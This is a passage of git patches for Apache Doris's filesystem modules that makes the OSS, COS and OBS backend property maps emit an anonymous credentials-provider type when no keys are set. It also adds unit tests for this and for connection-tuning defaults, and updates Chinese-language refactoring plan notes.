++++++ .../obs/ObsFileSystemPropertiesTest.java | 15 +++++++++++++++ .../filesystem/oss/OssFileSystemProperties.java | 6 ++++++ .../oss/OssFileSystemPropertiesTest.java | 15 +++++++++++++++ .../metastore-storage-refactor/deviations-log.md | 8 ++++++++ plan-doc/metastore-storage-refactor/risks.md | 2 +- plan-doc/metastore-storage-refactor/tasks.md | 5 +++-- 9 files changed, 75 insertions(+), 3 deletions(-) diff --git a/fe/fe-filesystem/fe-filesystem-cos/src/main/java/org/apache/doris/filesystem/cos/CosFileSystemProperties.java b/fe/fe-filesystem/fe-filesystem-cos/src/main/java/org/apache/doris/filesystem/cos/CosFileSystemProperties.java index 2d3478169465e9..216ab32513d2b1 100644 --- a/fe/fe-filesystem/fe-filesystem-cos/src/main/java/org/apache/doris/filesystem/cos/CosFileSystemProperties.java +++ b/fe/fe-filesystem/fe-filesystem-cos/src/main/java/org/apache/doris/filesystem/cos/CosFileSystemProperties.java @@ -236,6 +236,12 @@ private Map toBackendKv() { kv.put("AWS_REQUEST_TIMEOUT_MS", requestTimeoutMs); kv.put("AWS_CONNECTION_TIMEOUT_MS", connectionTimeoutMs); kv.put("use_path_style", usePathStyle); + // Mirror fe-core AbstractS3CompatibleProperties#getAwsCredentialsProviderTypeForBackend: + // anonymous access (no static credentials) emits ANONYMOUS; otherwise the key is omitted so + // BE uses SimpleAWSCredentialsProvider. COS never configures a provider type explicitly. + if (StringUtils.isBlank(accessKey) && StringUtils.isBlank(secretKey)) { + kv.put("AWS_CREDENTIALS_PROVIDER_TYPE", "ANONYMOUS"); + } return Collections.unmodifiableMap(kv); } diff --git a/fe/fe-filesystem/fe-filesystem-cos/src/test/java/org/apache/doris/filesystem/cos/CosFileSystemPropertiesTest.java b/fe/fe-filesystem/fe-filesystem-cos/src/test/java/org/apache/doris/filesystem/cos/CosFileSystemPropertiesTest.java index b9c39b58ae4685..8a78a2ff7ed0ec 100644 --- a/fe/fe-filesystem/fe-filesystem-cos/src/test/java/org/apache/doris/filesystem/cos/CosFileSystemPropertiesTest.java +++ b/fe/fe-filesystem/fe-filesystem-cos/src/test/java/org/apache/doris/filesystem/cos/CosFileSystemPropertiesTest.java @@ -122,6 +122,21 @@ void toBackendProperties_returnsOnlyAwsCompatibleKeysForBeAdapters() { Assertions.assertEquals("cos-bucket", backendMap.get("AWS_BUCKET")); Assertions.assertEquals("cos-role", backendMap.get("AWS_ROLE_ARN")); Assertions.assertFalse(backendMap.keySet().stream().anyMatch(key -> key.startsWith("COS_"))); + // Parity with fe-core AbstractS3CompatibleProperties#getAwsCredentialsProviderTypeForBackend: + // when static credentials are present the type is omitted (BE uses SimpleAWSCredentialsProvider). + Assertions.assertNull(backendMap.get("AWS_CREDENTIALS_PROVIDER_TYPE")); + } + + @Test + void toBackendProperties_emitsAnonymousProviderTypeWhenNoStaticCredentials() { + CosFileSystemProperties properties = CosFileSystemProperties.of(Map.of( + "cos.endpoint", "https://cos.ap-guangzhou.myqcloud.com")); + + Map backendMap = properties.toBackendProperties().orElseThrow().toMap(); + + // Parity with fe-core AbstractS3CompatibleProperties#getAwsCredentialsProviderTypeForBackend: + // both access key and secret key blank => anonymous access. + Assertions.assertEquals("ANONYMOUS", backendMap.get("AWS_CREDENTIALS_PROVIDER_TYPE")); } @Test diff --git a/fe/fe-filesystem/fe-filesystem-obs/src/main/java/org/apache/doris/filesystem/obs/ObsFileSystemProperties.java b/fe/fe-filesystem/fe-filesystem-obs/src/main/java/org/apache/doris/filesystem/obs/ObsFileSystemProperties.java index a0c171381da1b9..8ab8d80049c707 100644 --- a/fe/fe-filesystem/fe-filesystem-obs/src/main/java/org/apache/doris/filesystem/obs/ObsFileSystemProperties.java +++ b/fe/fe-filesystem/fe-filesystem-obs/src/main/java/org/apache/doris/filesystem/obs/ObsFileSystemProperties.java @@ -249,6 +249,12 @@ private Map toBackendKv() { kv.put("AWS_REQUEST_TIMEOUT_MS", requestTimeoutMs); kv.put("AWS_CONNECTION_TIMEOUT_MS", connectionTimeoutMs); kv.put("use_path_style", usePathStyle); + // Mirror fe-core AbstractS3CompatibleProperties#getAwsCredentialsProviderTypeForBackend: + // anonymous access (no static credentials) emits ANONYMOUS; otherwise the key is omitted so + // BE uses SimpleAWSCredentialsProvider. OBS never configures a provider type explicitly. + if (StringUtils.isBlank(accessKey) && StringUtils.isBlank(secretKey)) { + kv.put("AWS_CREDENTIALS_PROVIDER_TYPE", "ANONYMOUS"); + } return Collections.unmodifiableMap(kv); } diff --git a/fe/fe-filesystem/fe-filesystem-obs/src/test/java/org/apache/doris/filesystem/obs/ObsFileSystemPropertiesTest.java b/fe/fe-filesystem/fe-filesystem-obs/src/test/java/org/apache/doris/filesystem/obs/ObsFileSystemPropertiesTest.java index 8f471ab3c11b3e..3abc892f7e0848 100644 --- a/fe/fe-filesystem/fe-filesystem-obs/src/test/java/org/apache/doris/filesystem/obs/ObsFileSystemPropertiesTest.java +++ b/fe/fe-filesystem/fe-filesystem-obs/src/test/java/org/apache/doris/filesystem/obs/ObsFileSystemPropertiesTest.java @@ -93,6 +93,21 @@ void toBackendProperties_returnsOnlyAwsCompatibleKeysForBeAdapters() { Assertions.assertEquals("obs-bucket", backendMap.get("AWS_BUCKET")); Assertions.assertEquals("obs-role", backendMap.get("AWS_ROLE_ARN")); Assertions.assertFalse(backendMap.keySet().stream().anyMatch(key -> key.startsWith("OBS_"))); + // Parity with fe-core AbstractS3CompatibleProperties#getAwsCredentialsProviderTypeForBackend: + // when static credentials are present the type is omitted (BE uses SimpleAWSCredentialsProvider). + Assertions.assertNull(backendMap.get("AWS_CREDENTIALS_PROVIDER_TYPE")); + } + + @Test + void toBackendProperties_emitsAnonymousProviderTypeWhenNoStaticCredentials() { + ObsFileSystemProperties properties = ObsFileSystemProperties.of(Map.of( + "obs.endpoint", "https://obs.cn-north-4.myhuaweicloud.com")); + + Map backendMap = properties.toBackendProperties().orElseThrow().toMap(); + + // Parity with fe-core AbstractS3CompatibleProperties#getAwsCredentialsProviderTypeForBackend: + // both access key and secret key blank => anonymous access. + Assertions.assertEquals("ANONYMOUS", backendMap.get("AWS_CREDENTIALS_PROVIDER_TYPE")); } @Test diff --git a/fe/fe-filesystem/fe-filesystem-oss/src/main/java/org/apache/doris/filesystem/oss/OssFileSystemProperties.java b/fe/fe-filesystem/fe-filesystem-oss/src/main/java/org/apache/doris/filesystem/oss/OssFileSystemProperties.java index 4687e88e7ba6d3..6f0bc617eeb4f6 100644 --- a/fe/fe-filesystem/fe-filesystem-oss/src/main/java/org/apache/doris/filesystem/oss/OssFileSystemProperties.java +++ b/fe/fe-filesystem/fe-filesystem-oss/src/main/java/org/apache/doris/filesystem/oss/OssFileSystemProperties.java @@ -249,6 +249,12 @@ private Map toBackendKv() { kv.put("AWS_REQUEST_TIMEOUT_MS", requestTimeoutMs); kv.put("AWS_CONNECTION_TIMEOUT_MS", connectionTimeoutMs); kv.put("use_path_style", usePathStyle); + // Mirror fe-core AbstractS3CompatibleProperties#getAwsCredentialsProviderTypeForBackend: + // anonymous access (no static credentials) emits ANONYMOUS; otherwise the key is omitted so + // BE uses SimpleAWSCredentialsProvider. OSS never configures a provider type explicitly. + if (StringUtils.isBlank(accessKey) && StringUtils.isBlank(secretKey)) { + kv.put("AWS_CREDENTIALS_PROVIDER_TYPE", "ANONYMOUS"); + } return Collections.unmodifiableMap(kv); } diff --git a/fe/fe-filesystem/fe-filesystem-oss/src/test/java/org/apache/doris/filesystem/oss/OssFileSystemPropertiesTest.java b/fe/fe-filesystem/fe-filesystem-oss/src/test/java/org/apache/doris/filesystem/oss/OssFileSystemPropertiesTest.java index a4d7a11c6ce962..d8a1f661f2dcde 100644 --- a/fe/fe-filesystem/fe-filesystem-oss/src/test/java/org/apache/doris/filesystem/oss/OssFileSystemPropertiesTest.java +++ b/fe/fe-filesystem/fe-filesystem-oss/src/test/java/org/apache/doris/filesystem/oss/OssFileSystemPropertiesTest.java @@ -131,6 +131,21 @@ void toBackendProperties_returnsOnlyAwsCompatibleKeysForBeAdapters() { Assertions.assertEquals("oss-bucket", backendMap.get("AWS_BUCKET")); Assertions.assertEquals("oss-role", backendMap.get("AWS_ROLE_ARN")); Assertions.assertFalse(backendMap.keySet().stream().anyMatch(key -> key.startsWith("OSS_"))); + // Parity with fe-core AbstractS3CompatibleProperties#getAwsCredentialsProviderTypeForBackend: + // when static credentials are present the type is omitted (BE uses SimpleAWSCredentialsProvider). + Assertions.assertNull(backendMap.get("AWS_CREDENTIALS_PROVIDER_TYPE")); + } + + @Test + void toBackendProperties_emitsAnonymousProviderTypeWhenNoStaticCredentials() { + OssFileSystemProperties properties = OssFileSystemProperties.of(Map.of( + "oss.endpoint", "https://oss-cn-hangzhou.aliyuncs.com")); + + Map backendMap = properties.toBackendProperties().orElseThrow().toMap(); + + // Parity with fe-core AbstractS3CompatibleProperties#getAwsCredentialsProviderTypeForBackend: + // both access key and secret key blank => anonymous access. + Assertions.assertEquals("ANONYMOUS", backendMap.get("AWS_CREDENTIALS_PROVIDER_TYPE")); } @Test diff --git a/plan-doc/metastore-storage-refactor/deviations-log.md b/plan-doc/metastore-storage-refactor/deviations-log.md index fe88b9fcdacd2d..fc511a27e331c1 100644 --- a/plan-doc/metastore-storage-refactor/deviations-log.md +++ b/plan-doc/metastore-storage-refactor/deviations-log.md @@ -6,6 +6,14 @@ --- +## DV-005 — FU-T02 不新增 `credentialsProviderType` 字段(镜像 S3 的写法),改为内联镜像 legacy 基类条件 +- **日期**:2026-06-18 | **原计划位置**:task `FU-T02` / D-011(「给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType` 字段(镜像 `S3FileSystemProperties`)」)。 +- **为何不可行/不必要**:现场 recon(对照 `fe-core .../datasource/property/storage`)证伪「镜像 S3 字段」是正确做法—— + 1. **legacy OSS/COS/OBS 没有可配置的 provider type**:`OSSProperties/COSProperties/OBSProperties` 均**不** override `AbstractS3CompatibleProperties.getAwsCredentialsProviderTypeForBackend()`(:124-129),该基类仅在 **ak/sk 皆空**时返回 `ANONYMOUS`、否则 `null`(省略)。只有 `S3Properties` override(:308 恒非空,故 S3 typed 才有字段)。加可配置字段会引入 legacy 不存在的旋钮,并可能对**有凭据** catalog 误发 `DEFAULT`(D-011/FU-T02 验收明确「**非**无条件 DEFAULT」)。 + 2. **`S3CredentialsProviderType` 枚举在 `fe-filesystem-s3`**,而 `fe-filesystem-{oss,cos,obs}` **不依赖** s3 模块(仅 `fe-filesystem-spi`)→ 复用须移类到 api/spi = 扩白名单 + AskUserQuestion。recon 结论是**反过来**:根本不需要共享类型。 +- **新方案**:在每个 `toBackendKv()` 末尾**内联**镜像 legacy `doBuildS3Configuration`(:117-120)——`StringUtils.isBlank(accessKey) && StringUtils.isBlank(secretKey)` 时 `kv.put("AWS_CREDENTIALS_PROVIDER_TYPE", "ANONYMOUS")`,否则省略;字面量 `"ANONYMOUS"` == `AwsCredentialsProviderMode.ANONYMOUS.name()`。**仅** BE map(`toBackendKv`),**不**碰 `toHadoopConfigurationMap`(legacy 该键只进 `getBackendConfigProperties`)。无字段、无枚举、无跨模块依赖、无白名单扩展、无 AskUserQuestion。 +- **影响范围**:FU-T02 实现仅落 `fe-filesystem-{oss,cos,obs}/src/main` 各 +5 行 + test 各 +2 断言;与原 D-011 **功能等价且更贴 legacy**(更简、更外科,CLAUDE.md Rule 2/3/7);不影响 S3 typed(已有字段,行为不变)、不影响 R-006/FU-T03。**R-008 闭环**。 + ## DV-004 — P1-T04 BE 凭据全量切 typed 路会丢 HDFS BE 键(fe-filesystem 无 HDFS typed BE model)→ 用户定「按原计划全切、接受 HDFS 回归、follow-up 补 fe-filesystem HdfsFileSystemProperties」 - **日期**:2026-06-17 | **原计划位置**:设计 §5 T1 / WORKFLOW §5.2 T1 / **DV-002**(「P1-T03/T04 全量切换 fe-filesystem,含 P1-T04 BE 凭据也切 `toBackendProperties().toMap()`」,隐含与 P1-T03 同源等价);task `P1-T04`。 - **为何偏差(现场 recon 取证,对照真实代码)**:新 typed 路对 **HDFS 物理上产不出 BE 键**—— diff --git a/plan-doc/metastore-storage-refactor/risks.md b/plan-doc/metastore-storage-refactor/risks.md index b61fadb0937cb8..85e00b08fc5a95 100644 --- a/plan-doc/metastore-storage-refactor/risks.md +++ b/plan-doc/metastore-storage-refactor/risks.md @@ -23,7 +23,7 @@ - **缓解**:**follow-up FU-T01**——给 `fe-filesystem-hdfs` 新建 `HdfsFileSystemProperties`(`implements BackendStorageProperties`,override `FileSystemProvider.bind`)让 `bindAll` 收集 HDFS 项、`toBackendProperties()` 产 BE 键。**过渡期 HDFS-warehouse paimon 为已知回归**(用户 2026-06-17 明确接受)。 - **触发判据**:docker P1-T06 HDFS-backed flavor 读失败(**已知、非新 bug**;须与真新回归区分)。 -## R-008 — fe-filesystem typed OSS/COS/OBS BE map 缺 AWS_CREDENTIALS_PROVIDER_TYPE(无凭据 catalog 的 ANONYMOUS 漂移)| 状态:修复中(2026-06-18 D-011:P1-T06 之前先修,FU-T02 active-next;授权 fe-filesystem-{oss,cos,obs}) +## R-008 — fe-filesystem typed OSS/COS/OBS BE map 缺 AWS_CREDENTIALS_PROVIDER_TYPE(无凭据 catalog 的 ANONYMOUS 漂移)| 状态:已闭环(2026-06-18 FU-T02 完成 — `Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy 基类条件:ak/sk 皆空发 `ANONYMOUS`、否则省略[DV-005,未加可配置字段];UT RED→GREEN,OSS 13/0·COS 12/0·OBS 12/0 + 全模块绿,checkstyle 0;⚠️ docker 无凭据 OSS/COS/OBS 真闸在 P1-T06) - **描述(P1-T04 对抗 review `wf_09745716-d48` confirm MAJOR)**:fe-filesystem `Oss/Cos/ObsFileSystemProperties.toBackendKv()` **不发** `AWS_CREDENTIALS_PROVIDER_TYPE`(无该字段);legacy fe-core `AbstractS3CompatibleProperties.doBuildS3Configuration`(:117-120) 在 `getAwsCredentialsProviderTypeForBackend()` 非空时发,OSS/COS/OBS 基类(:124-129) 在 **ak/sk 皆空**时返回 `ANONYMOUS`(OSSProperties/COSProperties/OBSProperties 均不 override,仅 S3Properties override 恒非空)。S3 typed 路**有**该键(`S3FileSystemProperties:260`)。P1-T04 把 paimon BE 凭据切到 typed 路 → **无凭据 OSS/COS/OBS catalog 不再发 ANONYMOUS**。 - **影响**:仅影响**无静态 ak/sk** 的 OSS/COS/OBS catalog(有 ak/sk 不受影响——两路都发 ak/sk → BE 短路 SimpleAWSCredentialsProvider)。BE `aws_credentials_provider_version=v2` 默认下,缺该键 → `CredProviderType::Default` → `CustomAwsCredentialsProviderChain`(探 WebIdentity/ECS/EC2 instance profile/... 最后才 anonymous)。故在带 **IAM role 的 EC2/ECS 主机**上,新路会**误取 instance 凭据**而非 anonymous + 元数据探测延迟;纯公开桶最终仍 anonymous 成功(**非硬失败**)。 - **缓解**:**follow-up FU-T02**——给 fe-filesystem `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType`(镜像 `S3FileSystemProperties`),**精确 parity**=ak/sk 皆空时发 `ANONYMOUS`、否则省略(**非**无条件 DEFAULT)。超 P1 白名单(fe-filesystem 禁碰),与 FU-T01 同批/经用户批准。过渡期已知漂移。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 3567349368190d..feea66e98b09b4 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -135,8 +135,9 @@ - **依赖**:P1-T04(暴露缺口)。**D-010 授权**触碰 `fe-filesystem-hdfs`。**红线**:核心改 `fe-filesystem-hdfs/**`;F1 接线 + stale-注释 另碰 3 个已白名单文件(均 project-owned 方法体微改/注释):fe-core `FileSystemFactory.java`(+1 行 setProperty)、`FileSystemPluginManager.java`(bindAll javadoc)、fe-connector-paimon `PaimonScanPlanProvider.java`(注释);其它 fe-filesystem 模块仍禁碰。 - **完成态(2026-06-17,commit 待提交)**:新建 `HdfsFileSystemProperties`(`FileSystemProperties + BackendStorageProperties`,BE-only)+ `HdfsConfigFileLoader`(XML 资源,sysprop 接 `Config.hadoop_config_dir`);`HdfsFileSystemProvider` re-type + `bind()`/`create(P)`(`create(Map)`/`supports()` 不动);pom +`fe-foundation`+`commons-lang3`。**移植源 = fe-property `HdfsProperties`,parity by construction**。验证:fe-filesystem-hdfs 全模块 **78/0/0**(含新增 25 golden parity;既有 25 `DFSFileSystemTest` 等绿=create() 路零回归)、checkstyle 0、RED/GREEN 经 mutation 证、fe-core `-pl fe-core -am compile` 绿(验 FileSystemFactory/PluginManager 改)、`git diff` 白名单干净。**对抗 review `wf_5db99e32-2ad`(27 agent,4 lens+verify)**:清场 packaging/parity/scope,3 实质修(malformed-uri fail-loud + 2 stale 注释 + 11 测试),**F1 用户选「现在接好」**(config-dir sysprop 桥)。残留 oss-hdfs JindoFS 凭据=独立 FU(P1-T04 已起)。⚠️ **docker e2e 未跑**(HA/kerberized HDFS-warehouse 真闸在 P1-T06)。 -### FU-T02 🔜(active-next — 用户 2026-06-18 提前 + D-011 授权;排在 P1-T06 之前)给 fe-filesystem OSS/COS/OBS 补 AWS_CREDENTIALS_PROVIDER_TYPE(修 R-008) -- **做什么**:给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType` 字段(镜像 `S3FileSystemProperties`)+ 在 `toBackendKv()` 发 `AWS_CREDENTIALS_PROVIDER_TYPE`,**精确镜像 legacy**(ak/sk 皆空 → `ANONYMOUS`,否则**省略**——legacy OSS/COS/OBS 仅 blank-creds 才发 ANONYMOUS,非无条件 `DEFAULT`;S3 override 恒非空)。 +### FU-T02 ✅(2026-06-18 完成;D-011 授权)给 fe-filesystem OSS/COS/OBS 补 AWS_CREDENTIALS_PROVIDER_TYPE(修 R-008) +- **完成态(2026-06-18,commit 待提交)**:**DV-005**——recon 证伪「加字段镜像 S3」,改为在 `Oss/Cos/ObsFileSystemProperties.toBackendKv()` **内联**镜像 legacy `AbstractS3CompatibleProperties.doBuildS3Configuration`(:117-120):`StringUtils.isBlank(accessKey) && StringUtils.isBlank(secretKey)` → `kv.put("AWS_CREDENTIALS_PROVIDER_TYPE", "ANONYMOUS")`、否则省略。**无字段/无枚举/无跨模块依赖**(`S3CredentialsProviderType` 在 s3 模块、oss/cos/obs 不依赖;legacy OSS/COS/OBS 也无可配置 provider type,只 `S3Properties` override)。仅碰 BE map,不碰 `toHadoopConfigurationMap`(legacy 该键只进 `getBackendConfigProperties`)。**TDD**:3 个 `toBackendProperties_emitsAnonymousProviderTypeWhenNoStaticCredentials`(RED `expected but was ` → GREEN)+ 3 个有凭据测试加 `assertNull(AWS_CREDENTIALS_PROVIDER_TYPE)` 守省略。验证:OSS 13/0·COS 12/0·OBS 12/0 + 全模块绿、checkstyle 0、`git diff` 仅落 `fe-filesystem-{oss,cos,obs}/{main,test}`。⚠️ docker 无凭据闸在 P1-T06。 +- **做什么**:给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType` 字段(镜像 `S3FileSystemProperties`)+ 在 `toBackendKv()` 发 `AWS_CREDENTIALS_PROVIDER_TYPE`,**精确镜像 legacy**(ak/sk 皆空 → `ANONYMOUS`,否则**省略**——legacy OSS/COS/OBS 仅 blank-creds 才发 ANONYMOUS,非无条件 `DEFAULT`;S3 override 恒非空)。**[DV-005 修订:不加字段,内联条件——见完成态]** - **TDD(可 UT 落地,参 FU-T01)**:合成无凭据 OSS/COS/OBS map → `toBackendProperties().toMap()` 应含 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(RED→GREEN);带 ak/sk 则不发该键(或发 SimpleAWS-等价,对照 legacy `AbstractS3CompatibleProperties.doBuildS3Configuration` :117-129 + 各 `OSS/COS/OBSProperties` 不 override `getAwsCredentialsProviderTypeForBackend`)。 - **验收**:无凭据 OSS/COS/OBS typed BE map 与 legacy 等价(含 `ANONYMOUS`);有凭据零变化;UT 与 S3 typed 对照;checkstyle 0;`git diff` 仅落 `fe-filesystem-{oss,cos,obs}/**`(recon 若证须 api/spi 共享类型则先 AskUserQuestion)。 - **依赖**:P1-T04(暴露缺口,对抗 review `wf_09745716-d48`)。**D-011 授权**触碰 `fe-filesystem-{oss,cos,obs}`(白名单已 +)。**先做(与 FU-T03 一道)再 P1-T06。** From da58cb4b1349a4b71bfa83da610839b311e1614a Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 04:32:39 +0800 Subject: [PATCH 087/128] [FU-T03] fe-filesystem-{s3,oss,cos,obs}: guard tuning defaults with explicit UT assertions (R-006) P1-T03 removed paimon's canonical-translation tests (that responsibility moved to fe-filesystem), which left the S3/OSS/COS/OBS tuning defaults without any explicit unit-test guard: the values are emitted correctly today via field defaults, but a future edit could silently mis-tune them and only docker would catch it. Add one test-only assertion per module (toMaps_emit*TuningDefaultsWhenNotConfigured) covering both the BE map (AWS_MAX_CONNECTIONS / AWS_REQUEST_TIMEOUT_MS / AWS_CONNECTION_TIMEOUT_MS) and the Hadoop config map (fs.s3a.connection.maximum / .request.timeout / .timeout): S3 = 50/3000/1000, OSS/COS/OBS = 100/10000/10000 (verified against fe-core S3Properties.Env and OSS/COS/OBSProperties). Expected values are literals, not the DEFAULT_* constants, so mutating a default in the main class actually fails the guard. Mutation-proven: flipping each DEFAULT_MAX_CONNECTIONS turns all four tests red (expected <50> but was <99> / <100> but was <999>); reverted. No main code changed. S3 15/0, OSS 14/0, COS 13/0, OBS 13/0 + all sibling suites green; checkstyle 0. Docker e2e not run (P1-T06 gate). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../cos/CosFileSystemPropertiesTest.java | 18 +++++++ .../obs/ObsFileSystemPropertiesTest.java | 18 +++++++ .../oss/OssFileSystemPropertiesTest.java | 18 +++++++ .../s3/S3FileSystemPropertiesTest.java | 22 ++++++++ .../metastore-storage-refactor/HANDOFF.md | 53 ++++++++++--------- .../metastore-storage-refactor/PROGRESS.md | 13 ++--- plan-doc/metastore-storage-refactor/risks.md | 2 +- plan-doc/metastore-storage-refactor/tasks.md | 3 +- 8 files changed, 114 insertions(+), 33 deletions(-) diff --git a/fe/fe-filesystem/fe-filesystem-cos/src/test/java/org/apache/doris/filesystem/cos/CosFileSystemPropertiesTest.java b/fe/fe-filesystem/fe-filesystem-cos/src/test/java/org/apache/doris/filesystem/cos/CosFileSystemPropertiesTest.java index 8a78a2ff7ed0ec..0605b6db1e0061 100644 --- a/fe/fe-filesystem/fe-filesystem-cos/src/test/java/org/apache/doris/filesystem/cos/CosFileSystemPropertiesTest.java +++ b/fe/fe-filesystem/fe-filesystem-cos/src/test/java/org/apache/doris/filesystem/cos/CosFileSystemPropertiesTest.java @@ -139,6 +139,24 @@ void toBackendProperties_emitsAnonymousProviderTypeWhenNoStaticCredentials() { Assertions.assertEquals("ANONYMOUS", backendMap.get("AWS_CREDENTIALS_PROVIDER_TYPE")); } + @Test + void toMaps_emitCosTuningDefaultsWhenNotConfigured() { + CosFileSystemProperties properties = CosFileSystemProperties.of(Map.of( + "cos.endpoint", "https://cos.ap-guangzhou.myqcloud.com")); + + // Parity with fe-core COSProperties defaults (100 / 10000 / 10000). Literal expected values + // (not DEFAULT_* constants) so that mutating a default in the main class fails this guard. + Map beKv = properties.toMap(); + Assertions.assertEquals("100", beKv.get("AWS_MAX_CONNECTIONS")); + Assertions.assertEquals("10000", beKv.get("AWS_REQUEST_TIMEOUT_MS")); + Assertions.assertEquals("10000", beKv.get("AWS_CONNECTION_TIMEOUT_MS")); + + Map hadoopKv = properties.toHadoopConfigurationMap(); + Assertions.assertEquals("100", hadoopKv.get("fs.s3a.connection.maximum")); + Assertions.assertEquals("10000", hadoopKv.get("fs.s3a.connection.request.timeout")); + Assertions.assertEquals("10000", hadoopKv.get("fs.s3a.connection.timeout")); + } + @Test void bind_rejectsPartialStaticCredentialsLikeFeCore() { IllegalArgumentException exception = Assertions.assertThrows(IllegalArgumentException.class, diff --git a/fe/fe-filesystem/fe-filesystem-obs/src/test/java/org/apache/doris/filesystem/obs/ObsFileSystemPropertiesTest.java b/fe/fe-filesystem/fe-filesystem-obs/src/test/java/org/apache/doris/filesystem/obs/ObsFileSystemPropertiesTest.java index 3abc892f7e0848..9e4119e6b045aa 100644 --- a/fe/fe-filesystem/fe-filesystem-obs/src/test/java/org/apache/doris/filesystem/obs/ObsFileSystemPropertiesTest.java +++ b/fe/fe-filesystem/fe-filesystem-obs/src/test/java/org/apache/doris/filesystem/obs/ObsFileSystemPropertiesTest.java @@ -110,6 +110,24 @@ void toBackendProperties_emitsAnonymousProviderTypeWhenNoStaticCredentials() { Assertions.assertEquals("ANONYMOUS", backendMap.get("AWS_CREDENTIALS_PROVIDER_TYPE")); } + @Test + void toMaps_emitObsTuningDefaultsWhenNotConfigured() { + ObsFileSystemProperties properties = ObsFileSystemProperties.of(Map.of( + "obs.endpoint", "https://obs.cn-north-4.myhuaweicloud.com")); + + // Parity with fe-core OBSProperties defaults (100 / 10000 / 10000). Literal expected values + // (not DEFAULT_* constants) so that mutating a default in the main class fails this guard. + Map beKv = properties.toMap(); + Assertions.assertEquals("100", beKv.get("AWS_MAX_CONNECTIONS")); + Assertions.assertEquals("10000", beKv.get("AWS_REQUEST_TIMEOUT_MS")); + Assertions.assertEquals("10000", beKv.get("AWS_CONNECTION_TIMEOUT_MS")); + + Map hadoopKv = properties.toHadoopConfigurationMap(); + Assertions.assertEquals("100", hadoopKv.get("fs.s3a.connection.maximum")); + Assertions.assertEquals("10000", hadoopKv.get("fs.s3a.connection.request.timeout")); + Assertions.assertEquals("10000", hadoopKv.get("fs.s3a.connection.timeout")); + } + @Test void bind_rejectsPartialStaticCredentialsLikeFeCore() { IllegalArgumentException exception = Assertions.assertThrows(IllegalArgumentException.class, diff --git a/fe/fe-filesystem/fe-filesystem-oss/src/test/java/org/apache/doris/filesystem/oss/OssFileSystemPropertiesTest.java b/fe/fe-filesystem/fe-filesystem-oss/src/test/java/org/apache/doris/filesystem/oss/OssFileSystemPropertiesTest.java index d8a1f661f2dcde..b18a4f862dfc23 100644 --- a/fe/fe-filesystem/fe-filesystem-oss/src/test/java/org/apache/doris/filesystem/oss/OssFileSystemPropertiesTest.java +++ b/fe/fe-filesystem/fe-filesystem-oss/src/test/java/org/apache/doris/filesystem/oss/OssFileSystemPropertiesTest.java @@ -148,6 +148,24 @@ void toBackendProperties_emitsAnonymousProviderTypeWhenNoStaticCredentials() { Assertions.assertEquals("ANONYMOUS", backendMap.get("AWS_CREDENTIALS_PROVIDER_TYPE")); } + @Test + void toMaps_emitOssTuningDefaultsWhenNotConfigured() { + OssFileSystemProperties properties = OssFileSystemProperties.of(Map.of( + "oss.endpoint", "https://oss-cn-hangzhou.aliyuncs.com")); + + // Parity with fe-core OSSProperties defaults (100 / 10000 / 10000). Literal expected values + // (not DEFAULT_* constants) so that mutating a default in the main class fails this guard. + Map beKv = properties.toMap(); + Assertions.assertEquals("100", beKv.get("AWS_MAX_CONNECTIONS")); + Assertions.assertEquals("10000", beKv.get("AWS_REQUEST_TIMEOUT_MS")); + Assertions.assertEquals("10000", beKv.get("AWS_CONNECTION_TIMEOUT_MS")); + + Map hadoopKv = properties.toHadoopConfigurationMap(); + Assertions.assertEquals("100", hadoopKv.get("fs.s3a.connection.maximum")); + Assertions.assertEquals("10000", hadoopKv.get("fs.s3a.connection.request.timeout")); + Assertions.assertEquals("10000", hadoopKv.get("fs.s3a.connection.timeout")); + } + @Test void bind_rejectsPartialStaticCredentialsLikeFeCore() { IllegalArgumentException exception = Assertions.assertThrows(IllegalArgumentException.class, diff --git a/fe/fe-filesystem/fe-filesystem-s3/src/test/java/org/apache/doris/filesystem/s3/S3FileSystemPropertiesTest.java b/fe/fe-filesystem/fe-filesystem-s3/src/test/java/org/apache/doris/filesystem/s3/S3FileSystemPropertiesTest.java index e96bcf53b8e4ed..8fb37757c88ace 100644 --- a/fe/fe-filesystem/fe-filesystem-s3/src/test/java/org/apache/doris/filesystem/s3/S3FileSystemPropertiesTest.java +++ b/fe/fe-filesystem/fe-filesystem-s3/src/test/java/org/apache/doris/filesystem/s3/S3FileSystemPropertiesTest.java @@ -259,6 +259,28 @@ void of_bindsAndNormalizesCredentialsProviderType() { properties.toHadoopConfigurationMap().get("fs.s3a.aws.credentials.provider")); } + @Test + void toMaps_emitS3TuningDefaultsWhenNotConfigured() { + Map raw = new HashMap<>(); + raw.put("s3.endpoint", "https://s3.us-west-2.amazonaws.com"); + raw.put("s3.access_key", "ak"); + raw.put("s3.secret_key", "sk"); + + S3FileSystemProperties properties = S3FileSystemProperties.of(raw); + + // Parity with fe-core S3Properties.Env defaults (50 / 3000 / 1000). Literal expected values + // (not DEFAULT_* constants) so that mutating a default in the main class fails this guard. + Map beKv = properties.toFileSystemKv(); + Assertions.assertEquals("50", beKv.get("AWS_MAX_CONNECTIONS")); + Assertions.assertEquals("3000", beKv.get("AWS_REQUEST_TIMEOUT_MS")); + Assertions.assertEquals("1000", beKv.get("AWS_CONNECTION_TIMEOUT_MS")); + + Map hadoopKv = properties.toHadoopConfigurationMap(); + Assertions.assertEquals("50", hadoopKv.get("fs.s3a.connection.maximum")); + Assertions.assertEquals("3000", hadoopKv.get("fs.s3a.connection.request.timeout")); + Assertions.assertEquals("1000", hadoopKv.get("fs.s3a.connection.timeout")); + } + @Test void of_rejectsUnsupportedCredentialsProviderType() { Map raw = new HashMap<>(); diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index c71c1c9d553836..d55e70c26eaa01 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ 